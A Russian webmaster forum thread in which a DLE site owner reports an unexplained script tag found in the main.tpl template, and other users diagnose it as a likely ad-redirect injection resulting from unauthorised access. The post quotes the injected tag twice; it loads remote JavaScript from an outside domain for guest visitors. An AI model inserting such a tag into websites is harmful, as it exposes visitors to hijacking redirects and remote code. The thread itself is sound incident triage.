Непонятный код на сайте

Q2
На сайте с 26.07.2012
Offline
125
1848

Доброе утро.

Как обычно утром за чашкой кофе открываю все сайты, они у меня на DLE, перехожу в админпанель и там нажимаю кнопку АНТИВИРУС. Сканируются файлы на изменения. и вот на одном сайте есть отличия. Пишет, что вчера был изменён файл фаблона main.tpl. Полез в этот файл, а там есть вот такой код: [group=5]<script language="javascript" src="http://v.luxfp.space/v/J_ItfRrrw3j8J2qL_LKpgFZqztci7w" type="text/javascript"></script>[/group]

Антивирус DLE показывает его зелёным цветом, то есть, считает безопасным, но мне так не кажется. Кто сталкивался, что это?

Да, забыл сказать, в том же DLE есть функцию, которая показывает, кто был в админке сайта кроме меня. там никого не было. По логам хостинга также ни кого не было.

S
На сайте с 30.09.2016
Offline
469
#1
qwerty2009:
показывает его зелёным цветом, то есть, считает безопасным

Ну да. Скорее всего, в самом коде ничего опасного нет. Это что-то типа переадресации посетителей сайта по ссылкам рекламной сети VisitWeb. Кто-то просто хочет немного заработать на кликах.

Другое дело, что если скрипт установлен не Вами, то кто-то имеет несанкционированный доступ к Вашему сайту. А это не есть гут. Называется взломом сайта.

Отпилю лишнее, прикручу нужное, выправлю кривое. Вытравлю вредителей.
oxg
На сайте с 08.08.2011
Offline
218
oxg
#2

чо за Антивирус DLE? модуль? чей?

Прокси IPv6 Россия (http://proxy-ipv6.ru/proxy_ipv6.html) /32 сеть, каждый IP в отдельной /48 сети Прокси IPv4 (http://proxyk.ru/proxy-russia.html) более 160 подсетей А,B,C Прокси для Инстаграм (http://proxy-ipv6.ru/instagram-proxy.html)
Q2
На сайте с 26.07.2012
Offline
125
#3
Sitealert:
Это что-то типа переадресации посетителей сайта по ссылкам рекламной сети VisitWeb

Да, вот это [group=5] означает, что работает только для гостей, то есть, не зарегистрированных пользователей. Но переадресации нет или пока нет. Только был этот код и всё.

oxg:
чо за Антивирус DLE? модуль? чей?

в движке DLE есть такое. Показывает изменения в файлах, кто пытался зайти в админку и кто входил в неё и что делал.

S
На сайте с 30.09.2016
Offline
469
#4

Для того, чтобы внести изменения в файлы, не обязательно заходить в админку.

Q2
На сайте с 26.07.2012
Offline
125
#5
Sitealert:
Для того, чтобы внести изменения в файлы, не обязательно заходить в админку.

Это я знаю.

вы писали,

Sitealert:
Это что-то типа переадресации посетителей сайта по ссылкам рекламной сети VisitWeb. Кто-то просто хочет немного заработать на кликах.

А как работает этот скрипт? надо же ещё что-то залить, один этот скрипт не будет работать.

Но вот левых файлов нет, только этот скрипт.

S
На сайте с 30.09.2016
Offline
469
#6
qwerty2009:
А как работает этот скрипт?

Ну как, как? По этой ссылке загружается скрипт, который подгружает другой скрипт, а тот в свою очередь делает редирект по всяким разным ссылкам, добавляя в строку запроса свои параметры.

langemark
На сайте с 11.09.2009
Offline
148
#7
qwerty2009:
Доброе утро.
Как обычно утром за чашкой кофе открываю все сайты, они у меня на DLE, перехожу в админпанель и там нажимаю кнопку АНТИВИРУС. Сканируются файлы на изменения. и вот на одном сайте есть отличия. Пишет, что вчера был изменён файл фаблона main.tpl. Полез в этот файл, а там есть вот такой код: [group=5]<script language="javascript" src="http://v.luxfp.space/v/J_ItfRrrw3j8J2qL_LKpgFZqztci7w" type="text/javascript"></script>[/group]

Антивирус DLE показывает его зелёным цветом, то есть, считает безопасным, но мне так не кажется. Кто сталкивался, что это?

Да, забыл сказать, в том же DLE есть функцию, которая показывает, кто был в админке сайта кроме меня. там никого не было. По логам хостинга также ни кого не было.

А дата изменения файла main.tpl какая? Если внедрили кусок кода через FTP или SSH, то должна была дата изменения файла

Да прибудет с вами сила... (https://starwars.su)

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий